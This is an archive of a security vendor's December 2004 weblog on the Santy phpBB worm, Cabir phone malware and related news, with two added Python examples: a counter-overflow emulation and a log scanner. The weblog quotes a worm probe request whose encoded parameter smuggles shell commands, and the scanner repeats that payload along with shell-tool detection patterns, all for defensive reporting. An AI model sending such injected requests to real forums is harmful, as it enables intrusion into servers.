NEWS FROM THE LAB - December 2004


Friday, December 31, 2004

Anti-Santy-Worm going around? Posted by Mikko @ 09:34 GMT

There seems to be a new phpBB worm going around.

We don't have all the details yet, but this one seems to be using search engines to find vulnerable discussion forum sites and infect them via the phpBB highlight vulnerability. Then the worm tries to patch the system so Santy variants won't be able to infect it any more.

Finally, the worm drops a file called secure.php which contains this text and continues spreading further.

Anti-Santy-Worm defacement

This is not a beneficial worm. We have no idea how safe the patch the worm applies really is. We also have reports from phpBB administrators whose sites are already perfectly safe but are under a denial-of-service attack caused by the multiple requests this worm generates.


The last day of the year Posted by Mikko @ 06:50 GMT

So, it's the 31st of December.

Here are the top 10 viruses of the whole year, as reported to our statistics system:

  1. W32/Netsky.P@mm - 24.3 %
  2. W32/Netsky.D@mm - 10.2 %
  3. W32/Zafi.B@mm - 9.8 %
  4. W32/Sober.I@mm - 7.3 %
  5. W32/Netsky.B@mm - 6.1 %
  6. W32/Sober.G@mm - 5.5 %
  7. W32/Lovgate.W@mm - 4.0 %
  8. W32/Bagle.Z@mm - 3.3 %
  9. W32/Netsky.X@mm - 2.5 %
 10. W32/Netsky.Q@mm - 1.9 %

The data is a bit skewed, as there are several large ISPs reporting what they see on their email servers. So viruses like Sasser - which do not spread over email - get less coverage. Sasser probably would have been in the top 5 otherwise.

This is what the year looks like in a graph...the Mydoom.A peak in January is huge.


Thursday, December 30, 2004

Security locks revisited Posted by Mikko @ 15:14 GMT

Some of you might remember when we tested some security gadgets two months ago, and found a nameless cheapo USB security lock gadget seriously lacking.

USB lock

img from Bryan's blog
The idea was good (walk away from your PC and it gets locked automatically). There wasn't anything wrong with the hardware, but the software was useless.

The good news is that a guy called Bryan Batchelder has taken the hardware and written software for it that actually works. Have a look at his blog for details.


Wednesday, December 29, 2004

Bluetooth hacking Posted by Mikko @ 15:52 GMT

We've heard that the Trifinite group held an interesting presentation on Bluetooth hacking today at the 21st Chaos Communication Congress, which is currently underway in Berlin.

Their slides are available here.

Blooover in action


Tuesday, December 28, 2004

Comair flight cancellations caused by a 16-bit counter Posted by Mikko @ 21:17 GMT

A couple of days ago we discussed how Comair had cancelled over 1000 flights in the USA during the Christmas holidays.

It turns out the reason behind this was that the flight planning software they were using kept track of flight staff changes with a 16-bit counter; after 32768 changes it would simply stop working.


Details are available in an article in the Cincinnati Post.
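Added example (not Comair's software or F-Secure's code): a Python emulation of a signed 16-bit change counter that fails on the 32768th change, next to a guarded counter that warns before the limit and refuses to wrap. The signed width and the "unusable once negative" behaviour are assumptions modelled on the description above.

```python
"""Emulate a crew-change counter held in a signed 16-bit integer, plus a guarded replacement.

Assumptions (not from the article): the field is a two's-complement 16-bit signed integer
and the scheduler treats a negative counter as a fatal error.
"""

INT16_MAX = 32767  # largest value a signed 16-bit integer can hold


def wrap_int16(value):
    """Reduce a Python int to the value a two's-complement 16-bit register would hold."""
    return ((value + 0x8000) & 0xFFFF) - 0x8000


def legacy_run(changes):
    """Apply `changes` crew changes to the 16-bit counter.

    Returns (changes_applied_when_it_broke, counter_value).  The 32768th increment turns
    32767 into -32768, which is the point where the emulated scheduler stops working.
    """
    counter = 0
    for n in range(1, changes + 1):
        counter = wrap_int16(counter + 1)
        if counter < 0:
            return n, counter
    return changes, counter


class GuardedCounter:
    """Replacement counter of the same width that never wraps silently.

    It reports a warning once a configurable fraction of the limit is reached and raises
    instead of overflowing, so the failure is visible long before it is fatal.
    """

    def __init__(self, limit=INT16_MAX, warn_fraction=0.9):
        self.limit = limit
        self.warn_at = int(limit * warn_fraction)
        self.value = 0

    def increment(self):
        """Return (new_value, warning_flag); raise OverflowError rather than wrap."""
        if self.value >= self.limit:
            raise OverflowError(f"counter would exceed {self.limit}; reset or widen it")
        self.value += 1
        return self.value, self.value >= self.warn_at


def guarded_run(changes):
    """Apply `changes` increments; report how many were applied and when the warning fired."""
    counter = GuardedCounter()
    first_warning = None
    for n in range(1, changes + 1):
        try:
            _, warning = counter.increment()
        except OverflowError:
            return {"applied": n - 1, "first_warning": first_warning, "stopped": True}
        if warning and first_warning is None:
            first_warning = n
    return {"applied": changes, "first_warning": first_warning, "stopped": False}


if __name__ == "__main__":
    print(legacy_run(40000))   # the 32768th change flips the sign: (32768, -32768)
    print(guarded_run(40000))  # stops cleanly at 32767, having warned from change 29490 on
```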


New Cabir variant detected Posted by Jarno @ 14:03 GMT

Today we got yet another variant of Cabir.

Cabir.J is compiled from the same sources as Cabir.H and is very similar to it.

F-Secure Mobile Anti-Virus detects Cabir.J using generic detection, as Cabir.Gen.


Windows vulnerabilities found over Christmas time Posted by Mikko @ 09:13 GMT

We're a bit worried about the four new Windows vulnerabilities that were found during the Christmas holidays...especially since there are no current patches against them. Windows XP SP2 is immune to some - but not all - of them.

These vulnerabilities could be used in future viruses - for example in massmailers.

They are:

* Windows LoadImage API vulnerability. Can be used for remote code execution through crafted bitmap (.BMP), icon (.ICO), cursor (.CUR) and animated cursor (.ANI) files.
* Animated cursor (.ANI) vulnerability that causes a system crash.
* Help file overflow that can be exploited through crafted Windows Help (.HLP) files. This vulnerability reportedly also affects Windows XP SP2.
* HTML Help Control exploit that uses a number of different vulnerabilities to bypass IE's Local Zone protections in order to run scripts on the host. SP2 is vulnerable.

At least this last exploit has already been used for dropping Trojans.

While waiting for a patch, we recommend upgrading to Windows XP SP2 and using a browser no one else is using.


The Tsunami Tragedy Posted by Katrin @ 08:47 GMT

Like everyone else, we've been watching in horror the terrible tragedy caused by the earthquake and the tsunami in southern Asia. We would like to offer our condolences to anyone affected by it.

This is from everybody here at F-Secure.


Monday, December 27, 2004

Evolution in Cabir variants Posted by Jarno @ 12:48 GMT

We've found two new Cabir variants (Cabir.H and Cabir.I). As mentioned before, we've found several examples of phone malware over the last weeks, especially Cabir and Skulls variants, affecting Symbian Series 60 phones.

However, this time there are two important differences.

First of all, these new variants seem to be recompiled versions based on original Cabir source code. Which means that the Cabir source code is floating around in the underground. Which is bad news. We didn't know the sources were out there, and we've never seen them.

The second important difference is that these new Cabir variants fix a flaw that was slowing down the original Cabir's spreading speed. Cabir originally would only spread to one new phone per reboot, which explains why it has so far only managed to spread to eight countries (as far as we know), despite being in the wild for months already.

Cabir.H and Cabir.I can spread to an unlimited number of phones per reboot. As soon as a suitable target phone is seen, the worm sends itself there as a Bluetooth file transmission and keeps sending itself to that phone while it is still in range. Once the target phone leaves the area, Cabir.H will find a new target and continue spreading. This means that in conditions where people move around and new phones come into contact with each other, Cabir.H and Cabir.I can spread quite rapidly.

Apart from spreading, these new Cabirs don't do anything directly destructive or malicious. However, they do block all normal Bluetooth connectivity and they also drain the infected phone's battery very fast.

We have no reports of Cabir.H and Cabir.I in the wild yet. However, this is probably only a matter of time, as the virus writer behind these variants has publicly posted them on his web page.

Both new Cabir variants are detected by F-Secure Mobile Anti-Virus.

Symbian Series 60 worm / trojan history so far:

June 15th: Cabir.A is found
June 16th: Cabir.B is found
November 19th: Skulls.A trojan is found
November 29th: Skulls.B is found
December 9th: Cabir.C is found
December 9th: Cabir.D is found
December 9th: Cabir.E is found
December 21st: Skulls.C is found
December 21st: Cabir.F is found
December 21st: Cabir.G is found
December 26th: Cabir.H is found
December 26th: Cabir.I is found


PHP worm outbreaks not out of control Posted by Mikko @ 11:11 GMT

Although the concept of an automatic network worm that randomly targets sites with PHP vulnerabilities sounds really bad, in practice these latest Santy variants haven't gotten out of control.
This operation seems to be run by a group of Brazilian hackers that are creating a botnet which is controlled via an IRC server operating under

We checked the channel recently and it had less than 100 bots on it. So while there are lots of vulnerable sites out there, this worm is still under control.

It's actually surprising there aren't more infections, as the worm seems to be pounding some PHP sites aggressively, even to the point of creating a denial-of-service by just overloading them. This hits worst the sites that are best picked up by search engines. One administrator reported seeing 1-2 hits to his site every second for the past 20 hours.

In fact, the Santy variants that were found during the Christmas holidays shouldn't be categorized under the Santy family at all - the code is different and they are targeting a different vulnerability. The only similarities are that they all are written in Perl, all target PHP sites and all use search engines.

Update: The latest variants have now indeed been categorized under a new family called "Spyki".


Sunday, December 26, 2004

Phpishing issues Posted by Mikko @ 08:51 GMT

Santy source code snippet
We're now detecting the various PHP-related malware found over the last days as variants of these families:


They all target PHP or phpBB vulnerabilities.

Some of them try to search for targets using AOL and Yahoo search engines. As far as we can see, the AOL searches will fail but Yahoo searches are working. So we're once again trying to contact search engine administrations to get them to block malicious searches.

Computer problem grounds holiday flights Posted by Mikko @ 06:07 GMT

Comair airlines canceled all of its flights on Saturday 25th of December and Sunday 26th of December, leaving thousands of travellers stranded at airports.

According to CNN, "The computer system Comair uses to book pilots for flights broke down. Comair could not pinpoint a reason for the computer crash and could not say why there was no backup system."

F-Secure has no reason to suspect computer virus problems at this time.

Image from on 26th of December 2004


Saturday, December 25, 2004

25th of December Posted by Mikko @ 08:22 GMT

Today is the 25th of December. The Bacros virus activates today, deleting all files on all local hard drives.

An activation routine like that is pretty rare. We don't see destructive viruses too often nowadays...most of the new viruses just try to silently take over your machine instead of deleting files.

Bacros is in the wild. Over the last months we've received reports from several countries. But so far we haven't received any reports of overwritten hard drives. Then again, if your hard drive is overwritten, you can't easily email us, can you?

Historically, Christmas time has been fairly calm virus-wise. The only exception that comes to mind would be the Remote Explorer incident from Christmas 1998. This was the first virus ever to run as a service under Windows NT, and caused a bit of a stir back then.


Santy-like activity Posted by Mikko @ 08:08 GMT

Several phpBB administrators have reported to us that they are seeing lots of Santy-like activity.

As mentioned before, Google is filtering the searches that the original Santy (and the variants that were created by corruption) were using.

But now we're seeing fairly large network scans that are trying to find vulnerable phpBB forums in order to install IRC bots on them.

Typical requests look like this:

GET /phpBB2/viewtopic.php?t=533&rush=%65%63%68%6F%20%5F%53%54%41%52%54%5F%3B%20cd%20/tmp;;perl%20bot;;...
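Added example (not from the weblog or from F-Secure): a small Python log scanner that decodes the query parameter of viewtopic.php requests like the one above, flags the shell commands hidden in it, and counts flagged hits per source so the repeated requests that overload already-patched forums (mentioned in the "PHP worm outbreaks" post) stand out. It assumes Apache combined-format access-log lines; the sample lines are constructed, with the payload copied from the request above, and the parameter names and shell tokens are assumed heuristics.

```python
"""Flag phpBB viewtopic.php requests that smuggle shell commands in a query parameter.

Constructed example for defenders; assumes NCSA/Apache combined access-log lines.
"""
import re
from collections import Counter
from urllib.parse import unquote, urlsplit

# Parameters the December 2004 phpBB worms abused: the "highlight" hole and the "rush"
# parameter seen in the quoted request.  Assumed list; extend as new probes appear.
SUSPECT_PARAMS = ("highlight", "rush")
# Fragments a legitimate forum search term never contains (assumed heuristics).
SHELL_TOKENS = (";", "`", "cd /tmp", "perl ", "wget ", "lynx ", "curl ", "echo _")

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) \S+" (?P<status>\d{3})'
)

# Constructed sample log: one worm probe, one normal forum search, one unrelated hit.
SAMPLE_LOG = """\
203.0.113.7 - - [25/Dec/2004:08:01:12 +0000] "GET /phpBB2/viewtopic.php?t=533&rush=%65%63%68%6F%20%5F%53%54%41%52%54%5F%3B%20cd%20/tmp;;perl%20bot;; HTTP/1.1" 200 5120
198.51.100.9 - - [25/Dec/2004:08:01:13 +0000] "GET /phpBB2/viewtopic.php?t=12&highlight=firewall HTTP/1.1" 200 8891
203.0.113.7 - - [25/Dec/2004:08:01:14 +0000] "GET /phpBB2/index.php HTTP/1.1" 200 3000
"""


def decoded_params(target):
    """Split the query string on '&' only and percent-decode twice.

    Splitting by hand (instead of parse_qs) keeps the literal ';;' of the payload intact;
    the second unquote() catches %25xx double-encoding.
    """
    params = {}
    for pair in urlsplit(target).query.split("&"):
        key, _, value = pair.partition("=")
        params[unquote(key)] = unquote(unquote(value))
    return params


def classify(target):
    """Return {'param', 'decoded'} when the request looks like a worm probe, else None."""
    if not urlsplit(target).path.endswith("viewtopic.php"):
        return None
    params = decoded_params(target)
    for name in SUSPECT_PARAMS:
        value = params.get(name, "")
        if any(token in value for token in SHELL_TOKENS):
            return {"param": name, "decoded": value}
    return None


def scan(log_text):
    """Run classify() over every parsable log line and return the flagged requests."""
    hits = []
    for line in log_text.splitlines():
        match = LOG_RE.match(line)
        if match is None:
            continue
        verdict = classify(match["target"])
        if verdict:
            hits.append({"ip": match["ip"], "ts": match["ts"], **verdict})
    return hits


def hits_per_source(hits):
    """Count flagged requests per client IP: a source firing once or twice a second is
    the overload pattern administrators reported even on forums that were not vulnerable."""
    return Counter(hit["ip"] for hit in hits)


if __name__ == "__main__":
    flagged = scan(SAMPLE_LOG)
    for hit in flagged:
        print(f'{hit["ts"]} {hit["ip"]} {hit["param"]}={hit["decoded"]!r}')
    print(dict(hits_per_source(flagged)))
```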


Friday, December 24, 2004

Merry Christmas Posted by Mikko @ 06:13 GMT

Merry Christmas to all of our readers from the F-Secure weblog staff!

CHRISTMA EXEC image, copyright IEEE

Our Christmas greeting this year shows the payload of one of the first computer worms ever: CHRISTMA EXEC from 1987. This was a REXX worm affecting IBM mainframes. This picture is taken from an excellent write-up of the worm which is available on IEEE's web pages. Authors of the article include the almost-legendary Steve White and David Chess from IBM.

So, happy holidays. There will be four of us here at F-Secure monitoring the situation over Christmas.


Thursday, December 23, 2004

MP3 and video versions of the Data Security Summary 2004 Posted by Mikko @ 10:33 GMT

Audio and video versions of F-Secure Corporation's Data Security Summary for 2004 are now available.

Video is available as a Real Media file here: video

MP3 is available here: mp3

Speaking about MP3s...we find it really handy to listen to data security lectures, radio specials and interviews on our iPods or in our cars while doing something else. Places like ITConversations even have separate series for security-related audio. Also, lots of the Black Hat Briefings lectures are available as audio (but you do need a Real-to-MP3 converter if you want to take them with you). And Vmyths has a great selection of MP3s available (but you do have to dismangle the M3U files to get them).

So, let's hear your suggestions. Does anybody have good sources for audio that would be interesting to people working in data security? Let us know at weblog at our domain.


Wednesday, December 22, 2004

Google stops Santy Posted by Ceco @ 18:25 GMT

We are happy to report that Google is indeed filtering the requests coming from the Santy-infected machines as reported here: Wrapup on Case Santy

To verify this, after dissecting the worm in our test labs, we took a single query that the worm generates and sent it to Google. The result was the expected 403 error code with a brief explanation of why the search was denied, as shown in the picture below.

Google 403 response (screenshot)


Wrapup on case Santy Posted by Mikko @ 06:17 GMT

This case is now over. The Santy worm is not spreading any more, thanks to Google.

Google started filtering the queries made by the worm around midnight GMT, effectively stopping the spread of the worm. Apparently they are doing this based on a combination of the search terms and the User-Agent header field.

This is from an email we got from the Google Security Team:

  While a seven hour response for something like this is not outrageous,
  we think we can and should do better. We will be reviewing our
  procedures to improve our response time in the future to similar problems.

Google has also started showing the defaced websites in its index. MSN Search already had them visible over 12 hours ago, so apparently the indexing process takes longer at Google.

As we reported earlier, MSN Search reports huge numbers of websites to be affected. However, if you keep viewing the search index pages, you get different results. MSN Search reports 29,000 hits, but runs out of hits already on search index page 15 - with 153 actual hits shown. Google finds 202 defaced sites right now. It's hard to estimate how many actual sites got hit.

Results from MSN
Results from Google

Another thing that can be figured out from the search engines is the generation count of the worm. Santy displays its generation number in the defacement. So, say, generation 5 would mean that this specific instance of the worm would have infected four web sites before this one.

The highest generation count we've been able to locate is 22.

Santy Generation 22

We won't be seeing much higher generation counts. One reason for that is that Santy gets easily corrupted. The exploit it uses is only able to transfer around 20 bytes of data at a time, so the worm transfers itself from one web site to another in small chunks. If a chunk goes missing, the worm might still work fine (it's a Perl script, after all...Perl looks like line noise anyway) - or it might fail. The more generations there are, the more likely it is to fail because of this.

We can also adjust the first sighting time for this worm. One of our readers reports seeing Santy infection attempts in his phpBB logs already at 9:25 GMT on 20th of December - which is 18 hours earlier than our earliest sighting so far (thanks, Constantinos).

That's it. From our point of view this is now case closed.


Tuesday, December 21, 2004

Google could stop the Santy worm right now Posted by Mikko @ 19:12 GMT

We've been trying to reach the right persons at Google for the past hours...they could stop this Santy outbreak right now simply by not responding to the queries the virus uses. This wouldn't hurt any end users and would in fact take load off Google's servers.

Don't any of our readers know any hardcore techies working at the right places in Google? Ask them to get in touch with us by mailing weblog at our domain - thanks!


Two new Symbian malwares found Posted by Jarno @ 18:47 GMT

Well, this seems to be an active day.

Today we also got another sample which contains two new pieces of Symbian malware. MGDropper is a malicious file distributed as Metal Gear.SIS. It disables file managers and anti-virus programs (but fails to disable F-Secure Mobile Anti-Virus).

This thing also installs Cabir.G. Unlike the Skulls trojans, MGDropper disables only the phone's application installer, not all built-in applications.

This thing is detected with generic detection by F-Secure Mobile Anti-Virus.


Skulls.C and Cabir.F found Posted by Jarno @ 17:38 GMT

Today we got a sample that contains the Skulls.C trojan, which is quite similar to the other variants of the Skulls family. Skulls.C disables built-in phone applications and the most well-known third-party file managers, and installs Cabir.F on the phone.

Skulls.C also tries to disable F-Secure Mobile Anti-Virus - but fails.

As with the other Skulls trojans, Cabir.F is dropped into an incorrect directory, so it won't start automatically. F-Secure Mobile Anti-Virus already has generic detection that detects both Skulls.C and Cabir.F as Cabir.gen and prevents them from being installed on the phone. So the case is rather low risk.


Vulnerable versions of phpBB Posted by Mikko @ 16:41 GMT

Apparently version 2.0.11 of phpBB is not vulnerable to the Santy worm. That's according to the description of the apparent vulnerability ("viewtopic.php highlight") posted to Securiteam's site.

Users of older versions might want to check out these tips posted to phpBB's own forum.

Also, this thread is discussing the same problem.


Lots of sites have been defaced by Santy.A worm Posted by Alexey @ 15:58 GMT

If you try to search for defaced sites using the MSN Search Engine, you will see an enormous amount of sites that have been defaced by the Santy.A worm. Search using the following text string:

"This site is defaced!!!" NeverEverNoSanity

Click HERE to search defaced websites using the above mentioned string.

At this moment the search finds tens of thousands of defaced websites! It should be noted that some of the defaced sites have been restored already, but many are still defaced...


More on the new phpBB forum worm Posted by Mikko @ 15:46 GMT

This worm is written in Perl. It's searching vulnerable forum sites via Google. When a suitable site is found, the worm uses a remote exploit to gain access to it, defaces it and restarts random scanning for new hosts.

There have been several serious holes in the phpBB software over the years. One was discussed in Netcraft just days ago.

We don't know how many phpBB sites there are in the world, but Google search for inurl:phpbb inurl:viewtopic gives over a million hits...

The first defacement we heard about happened today at around 15:00 GMT.

Official home page of phpBB does not mention this incident yet.


New internet worm Santy spreading! Posted by Mikko @ 15:12 GMT

The new worm Santy has started spreading. This one infects only web servers, not end user computers. In fact, it infects sites running the popular phpBB discussion forum software.

Many sites are already affected...the end result typically looks like this:


We detect this worm as "Santy.A" with updates that are going out right now.


Monday, December 20, 2004

Spammers ordered to pay $1 billion Posted by Mikko @ 07:18 GMT

Spam, spam, spam, spam, spam, spam, spam, spam, beans, bacons and spam.
From CNN.COM: A judge has awarded an Internet service provider more than $1 billion in what is believed to be the largest judgment ever against spammers.

Three spammers (AMP Dollar Savings Inc, Cash Link Systems Inc and TEI Marketing Group) were ordered to pay US$ 1,080,140,000 (that's a lot of zeroes) to a small ISP operating in Iowa.

However, the spammers seem to be unreachable and there's little hope they would actually pay much in real life.


Friday, December 17, 2004

Another new Atak found Posted by Mikko @ 15:42 GMT

A new minor variant of the Atak worm was found today (we detect it already).

This one also sends fake electronic Christmas cards.

Interestingly, it also contains a link to an image mocking Lycos' "Make Love Not Spam"; the image reads "Make Love With Spam":



Thursday, December 16, 2004

Nine year sentence for wardriving in USA Posted by Mikko @ 07:26 GMT

Lowe's logo Copyright (c) Lowe's
A 21-year-old hacker has been sentenced to jail in Michigan for hacking via wardriving.

Wardriving is a technique in which you drive around in a car with an antenna to search for vulnerable WLAN access points. Some spammers have been using this to get anonymous net access.

In this case, Brian Salcedo was sitting in a car in the parking lot of the local Lowe's (a home improvement store), trying to steal credit card numbers from the store's systems through their open WLAN network.

Mr. Salcedo was sentenced yesterday to nine years in jail. Which sounds like a pretty long sentence.

Salcedo, together with his partners Paul Timmins (aka noweb4u) and Adam Botbyl (aka itszer0), pleaded guilty in August according to a release from the FBI.


Wednesday, December 15, 2004

It's that time of the year... Posted by Mikko @ 14:57 GMT

Zafi.D and Atak.H keep spreading, posing as Christmas cards. We've seen this many times before, for example with the Maldal and Navidad viruses.

As an example, Maldal was sending fake Christmas cards looking like this during Christmas 2001:


And some of the readers might even remember Happy99, arguably the first email massmailer ever. It posed as a Happy New Year greeting card:

Happy99 aka Ska virus

Our advice: steer away from electronic greeting cards. Go for the traditional pen-and-paper ones...


Another Christmas greeting virus found Posted by Alexey @ 13:37 GMT

A new variant of the Atak worm was found on the 15th of December 2004. The worm spreads in emails that have the subject "Merry X-Mas!" or "Happy New Year!". Here's an example of what the worm's message looks like:


F-Secure Anti-Virus detects Atak.h worm with the 2004-12-15_01 update.


Summary for year 2004 published Posted by Mikko @ 04:19 GMT

Wrap-up 2004
We've published our annual Data Security summary.

Year 2004 was split down the middle: the beginning of the year was record-breakingly busy with a huge number of major new virus outbreaks and the "virus war" between Mydoom, Bagle and Netsky. After June, things calmed down, and we've only seen some outbreaks since.

Other developments: open-source botnets, massive phishing cases, a big increase in professional virus writing. The number of known viruses passed the 100,000 mark. The first real mobile phone viruses were found. Spamming is getting worse and worse - and more profitable for spammers.

On the other hand, year 2004 was the best year ever in actually catching virus writers and other cyber criminals.

The full wrap-up is available here:

Similar wrap-ups are available for 2003 and 2002 too.



Tuesday, December 14, 2004

Microsoft releases 5 new security updates Posted by Ceco @ 18:01 GMT

Today Microsoft released 5 new security updates. All five are marked with severity "important". Four of the five updates are released to fix possible Remote Code Execution, and one fixes a possible Elevation of Privilege.

Details can be found in the updated Security Bulletin for December.


Zafi.D upgraded to Radar Level 2 Posted by Sami @ 13:31 GMT

Due to increased submissions, we have upgraded Zafi.D to Radar Level 2. Here is an example of an email sent by Zafi.D, in English:

Zafi.D email screenshot


New Zafi outbreak starting? Posted by Katrin @ 10:24 GMT

We received reports of a new Zafi.D worm variant today. As its social engineering, this one uses Christmas greetings in its emails in many different languages.

Monday, December 13, 2004

Lots of people find spam useful Posted by Mikko @ 13:21 GMT

Lots of people find spam useful, since they are buying the products advertised in spam.

This is according to a new report from Forrester Research, commissioned by the BSA. The survey found that 41% of Americans had purchased something via spam. The same percentage for France was 48% and for Brazil, 66%!

Spam works because people buy from spammers.

People, stop buying from spammers.

More data on the study from BSA.

Image Copyright 2004 Forrester Research and BSA


Friday, December 10, 2004

Wi-Fi paint? Posted by Mikko @ 11:25 GMT

Well, here's an interesting niche market. A company called Force Field Wireless is selling anti-WLAN paint!

"This specially formulated flat interior paint will help reduce the transmission of radio waves through walls, ceilings and doors. A great solution for protecting your Wi-Fi, Wi-Max, Bluetooth or any wireless network in the 5GHz or less frequency range. Stop radio interferences from slowing down your network. Prevent your wireless data from being hi-jacked."

So this would be security by decoration, I guess.



Jigsaw Piece - 386 Posted by Mikko @ 11:25 GMT


Thursday, December 9, 2004

Two new Cabir variants found Posted by Jarno @ 14:04 GMT

Today we got a sample that contains two new variants of Cabir worm.

The new variants are Cabir.C and Cabir.D. They are minor, so-called hex-edit variants, which means that while they show different text and use different filenames, they are otherwise identical to Cabir.B.

Cabir.C uses the filename MYTITI.SIS and shows the text MYTITI.

Cabir.D uses the filename [YUAN].SIS and shows the text [YUAN].

Both Cabir samples arrived in a Symbian installation file named "Norton AntiVirus 2004 Professional.sis", which contains Cabir.B, Cabir.C and Cabir.D. We have named the file SymbOS/Cabir.Dropper.

F-Secure Mobile Anti-Virus detects the Cabir.C and Cabir.D variants with up-to-date databases, and already provided detection for the Cabir.Dropper.

Tomorrow I will go to the RF-shielded lab and do a more detailed analysis of the new variants.


New vulnerability affects multiple browsers Posted by Ero @ 05:21 GMT

Secunia has reported a vulnerability allowing a third party to hijack, for instance, pop-ups from a legitimate site.

In other words, a malicious site would be able to direct a user to a real site (for instance a bank) and take over any pop-up such site might open (a login screen), leading to any data entered there being instantly compromised.


Wednesday, December 8, 2004

Virus attacking websites of the Chechen rebels Posted by Mikko @ 21:25 GMT

We have a small number of reports of a virus known as Maslan.

This worm can spread using LSASS and DCOM exploits, as well as by mass-mailing itself in emails looking like this:

  From: (varies)
  To: (random address)
  Subject: 123
  Hello Bob
  Best regards,
  Attachment: PlayGirls2.exe

Interestingly, this virus launches a distributed denial-of-service attack against several websites operated by the Chechen rebels.
Chechen rebels have been fighting the Russian army for over a decade. They are best known for two recent sieges against civilians: one in a Moscow theater and one in a school in Beslan.

Chechen rebels have been operating several different websites for years. One of these sites is, which has been a source of lots of recent controversy. This site has been a target of several network attacks (some of them reportedly originating from the IP range owned by the Russian Federal Security Service, FSB). The site has been closed down and kicked out of several countries, including Russia, Lithuania, Estonia and Finland. Right now it's operating in Sweden.

Maslan launches the attack against these domains:


Monday, December 6, 2004

Fake Lycos screensaver Posted by Katrin @ 13:36 GMT

We got reports that a fake Lycos screensaver has been distributed in emails that look like this:

  Subject: Be the first to fight spam with Lycos screen saver
  Attachment: Lycos screensaver to fight

The file inside the attachment is not the famous Lycos "Make love not spam" screensaver. Instead it's a RAR SFX archive that has an embedded keylogger inside. Detection for that archive's executable file was added as 'TrojanDropper.FakeSpamFighter'.

Lycos has been notified of the incident.


Friday, December 3, 2004

Sorting out Cabir/Camtimer mess Posted by Jarno @ 12:01 GMT

The situation with repacked versions of Cabir.B is getting rather confusing. Some companies are talking about Cabir.B being in Camtimer.sis file, while others are talking about viruses called "Camtimer.A" and "Camtimer.B". So it's time to bring some order to this mess.

The malware in question here is SymbOS/Cabir.B, which some 'clever' people have packed into different SIS files using a Symbian tool called makeSIS.

Putting something into a SIS file is something like making a Java JAR archive or a Microsoft MSI installation file; you are making an archive file with extra information that is read by the system installer. So repacking Cabir.B into a new SIS file does not make a new Cabir variant, let alone new malware.

A SIS file contains quite a lot of property information and one can do interesting things with just a SIS file, as we have seen with Skulls.A and Skulls.B. So it is easy to get confused.

Here's a list of the Cabir.B packages we have seen so far:

Original Caribe.B

Shows pop-up text "3d_OIDI500 by". Renames into and contains an AIF file that changes the Cabir icon to look like a bag of gold. Renaming breaks the Cabir.B functionality. As an end result, instead of sending copies of itself via Bluetooth, it sends files with zero length.

Shows pop-up text "This is advanced camera timer for your phone". Installs Cabir.B and the Camtimer camera timer software from Nokia. Cabir.B is not set to start automatically on SIS install and is installed into the wrong directory, so it won't start when the phone reboots. If the user clicks on the icon manually, Cabir will start and will spread as Caribe.sis - which contains only the Cabir.B executables. The same Camtimer.sis file is also found inside Skulls.B's SIS file, and is copied into the system when Skulls.B is installed.

There is also another version of Camtimer.SIS that some companies call Camtimer.B. We haven't got a sample of this one yet, but it appears to be almost identical to the one described above, except that it installs Cabir.B into the correct directory for it to start automatically. But this does not make it new malware.


When is a defacement not a defacement? Posted by Mikko @ 06:31 GMT

Continuing on the status of the controversial site: We have been discussing the case with the maintainers of this site (who are in Sweden). They've checked their systems several times and have found no evidence of a defacement or of an intrusion of any kind.

Regardless of that, we've had several users report a defacement to us, even sending us screenshots like this:

Make defacements not spam

So, what's happening here?

Well, there are basically two choices. One is that some internet operators are not allowing traffic from their IP range to this website - instead, they are referring it to a site with this 'educational' message.

The other choice is DNS poisoning. DNS poisoning is an attack where a malicious attacker floods a domain name server with DNS requests and fake responses to them. The target is to convince a specific DNS server that domain FOO.BAR should point to when it really should point to, or so. However, such an attack isn't global - only users behind a specific DNS server would access the wrong site. But for those users it would be nearly impossible to notice.

This vulnerability has been known for ages. It used to be fairly easy to do, but then random number generators used by BIND and other DNS tools got improved, making it much harder.

However, it is still doable. For more details, read a good paper on the subject, written by Joe Stewart (of LURHQ fame).


Thursday, December 2, 2004

A re-packed Netsky variant found Posted by Alexey @ 14:23 GMT

We have received a few submissions of a re-packed Netsky worm variant. It is functionally identical to the Netsky.Z worm, but is additionally packed with ASPack file compressor. We detect this variant as 'W32/Netsky.Z@mm' or as 'Email-Worm.Win32.NetSky.aa'.

Spammers fight back Posted by Alexey @ 09:37 GMT

In an interesting twist, apparently one of the spam sites under attack from Lycos' "Make Love not Spam" operation has turned the tables. The front page of a spammer site called (which used to sell cheap mortgage loans) has been changed to contain a Meta Refresh tag, redirecting all web traffic

As an end result, depending on how the Lycos client works, the screen savers downloaded from might be attacking the download site itself.

In another development, Lycos made a statement that this site was not defaced two days ago (see our weblog post on November 30th). However, we've received three independent reports from users who saw the defacement and even made screen shots of it...including one report from an editor of a computer magazine.

Update on 4th of December, 2004: Lycos has confirmed to us that their screensaver does not follow Meta Refresh tags, so this attempt by spammers will fail. --Mikko


Important note about Microsoft's MS04-040 update Posted by Sami @ 08:38 GMT

According to Microsoft, the MS04-040 update does not include all hotfixes or patches released since February's (MS04-004) or October's (MS04-038) Cumulative Updates for Internet Explorer. So, if you have received fixes via Microsoft or via their support providers, you should use Internet Explorer SP1 update rollup instead.

As Ero mentioned earlier, MS04-040 fixes the Internet Explorer vulnerability that is being actively exploited. This vulnerability was used, for example, by the Bofra worm, so upgrading as soon as possible is highly recommended.


Wednesday, December 1, 2004

Microsoft releases critical update for IE Posted by Ero @ 19:41 GMT

Today Microsoft released a critical update for Internet Explorer. Affected systems are Windows NT, 2000 and Windows XP. Windows XP SP2 and the 64-bit version are not affected.

More detailed information can be found in Microsoft Security Bulletin MS04-040.

This update fixes a bug that allows remote code execution. This bug has been exploited by several pieces of malware lately.


Feature story on Sasser incident Posted by Mikko @ 11:03 GMT

Image (c) PC World
PC World published this last month but we just noticed the article now: there's a pretty good feature story on case Sasser in the November issue.

This article, written by former intelligence officer Dan Verton, explains in detail how exactly the LSASS hole was found, what Microsoft was doing to patch it and how the exploit code that ended up in the Sasser worm was generated.

There's also a nice timeline in the article.